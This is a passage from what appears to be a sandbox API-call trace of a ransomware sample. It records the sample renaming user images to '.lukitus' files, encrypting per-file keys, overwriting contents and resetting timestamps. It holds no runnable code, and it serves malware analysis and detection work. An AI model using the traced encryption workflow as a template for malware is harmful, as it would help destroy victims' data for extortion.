pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.934] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\lvLOYOhTcvvr3 yEH.gif" (normalized: "c:\\users\\aetadzjz\\desktop\\lvloyohtcvvr3 yeh.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.934] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\lvLOYOhTcvvr3 yEH.gif" (normalized: "c:\\users\\aetadzjz\\desktop\\lvloyohtcvvr3 yeh.gif"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-0DCFA9E5-FAF41D841F89.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-0dcfa9e5-faf41d841f89.lukitus"), dwFlags=0x9) returned 1 [0107.936] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.936] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.940] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xe8b3, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xe8b3, lpOverlapped=0x0) returned 1 [0107.941] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.941] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xe8b3, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xe8b3, lpOverlapped=0x0) returned 1 [0107.942] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.942] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x645c7af0, dwHighDateTime=0x1d31760)) [0107.942] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.942] FlushFileBuffers (hFile=0x328) returned 1 [0107.946] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\gXdxZsT0C5_j5.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\gxdxzst0c5_j5.bmp"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7a21aa0, ftCreationTime.dwHighDateTime=0x1d2ff26, ftLastAccessTime.dwLowDateTime=0xa3ca4cd0, ftLastAccessTime.dwHighDateTime=0x1d2f95b, ftLastWriteTime.dwLowDateTime=0xa3ca4cd0, ftLastWriteTime.dwHighDateTime=0x1d2f95b, nFileSizeHigh=0x0, nFileSizeLow=0xe1ed)) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.947] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\gXdxZsT0C5_j5.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\gxdxzst0c5_j5.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.947] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\gXdxZsT0C5_j5.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\gxdxzst0c5_j5.bmp"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\F56924BE-9663-41BB-4FE46AF0-E6208DFC4337.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\f56924be-9663-41bb-4fe46af0-e6208dfc4337.lukitus"), dwFlags=0x9) returned 1 [0107.948] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.948] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.954] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xe1ed, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xe1ed, lpOverlapped=0x0) returned 1 [0107.954] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.954] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xe1ed, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xe1ed, lpOverlapped=0x0) returned 1 [0107.955] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x645edc50, dwHighDateTime=0x1d31760)) [0107.955] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.955] FlushFileBuffers (hFile=0x328) returned 1 [0107.958] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W\\f3vo8D7NyvoaKcAkRsY.gif" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\hmcn--w\\f3vo8d7nyvoakcakrsy.gif"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b85060, ftCreationTime.dwHighDateTime=0x1d30142, ftLastAccessTime.dwLowDateTime=0xf04415e0, ftLastAccessTime.dwHighDateTime=0x1d3032a, ftLastWriteTime.dwLowDateTime=0xf04415e0, ftLastWriteTime.dwHighDateTime=0x1d3032a, nFileSizeHigh=0x0, nFileSizeLow=0x1534e)) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.959] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W\\f3vo8D7NyvoaKcAkRsY.gif" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\hmcn--w\\f3vo8d7nyvoakcakrsy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.959] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W\\f3vo8D7NyvoaKcAkRsY.gif" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\hmcn--w\\f3vo8d7nyvoakcakrsy.gif"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W\\F56924BE-9663-41BB-8EBDCA29-FD38B8601764.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\hmcn--w\\f56924be-9663-41bb-8ebdca29-fd38b8601764.lukitus"), dwFlags=0x9) returned 1 [0107.961] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.961] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.966] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x1534e, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x1534e, lpOverlapped=0x0) returned 1 [0107.967] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.967] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x1534e, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x1534e, lpOverlapped=0x0) returned 1 [0107.967] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.968] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64613db0, dwHighDateTime=0x1d31760)) [0107.968] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.968] FlushFileBuffers (hFile=0x328) returned 1 [0107.971] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\6SCeJgmwXwG2GjK0Jp.gif" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\6scejgmwxwg2gjk0jp.gif"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9007a0, ftCreationTime.dwHighDateTime=0x1d30441, ftLastAccessTime.dwLowDateTime=0x29500d00, ftLastAccessTime.dwHighDateTime=0x1d2fdac, ftLastWriteTime.dwLowDateTime=0x29500d00, ftLastWriteTime.dwHighDateTime=0x1d2fdac, nFileSizeHigh=0x0, nFileSizeLow=0x3cb3)) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.971] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.972] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.972] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.972] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\6SCeJgmwXwG2GjK0Jp.gif" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\6scejgmwxwg2gjk0jp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.972] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\6SCeJgmwXwG2GjK0Jp.gif" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\6scejgmwxwg2gjk0jp.gif"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\F56924BE-9663-41BB-BFE5064B-970C8F5A0518.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\f56924be-9663-41bb-bfe5064b-970c8f5a0518.lukitus"), dwFlags=0x9) returned 1 [0107.973] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.973] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.978] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x3cb3, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x3cb3, lpOverlapped=0x0) returned 1 [0107.978] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.978] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x3cb3, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x3cb3, lpOverlapped=0x0) returned 1 [0107.979] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.979] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64613db0, dwHighDateTime=0x1d31760)) [0107.979] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.979] FlushFileBuffers (hFile=0x328) returned 1 [0107.982] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\uoE18q.png" (normalized: "c:\\users\\aetadzjz\\pictures\\uoe18q.png"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69a8a4e0, ftCreationTime.dwHighDateTime=0x1d301d8, ftLastAccessTime.dwLowDateTime=0xd3646940, ftLastAccessTime.dwHighDateTime=0x1d305bc, ftLastWriteTime.dwLowDateTime=0xd3646940, ftLastWriteTime.dwHighDateTime=0x1d305bc, nFileSizeHigh=0x0, nFileSizeLow=0x116ca)) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.982] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\uoE18q.png" (normalized: "c:\\users\\aetadzjz\\pictures\\uoe18q.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.983] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\uoE18q.png" (normalized: "c:\\users\\aetadzjz\\pictures\\uoe18q.png"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\F56924BE-9663-41BB-85A5B08A-605B60B6EBD6.lukitus" (normalized: 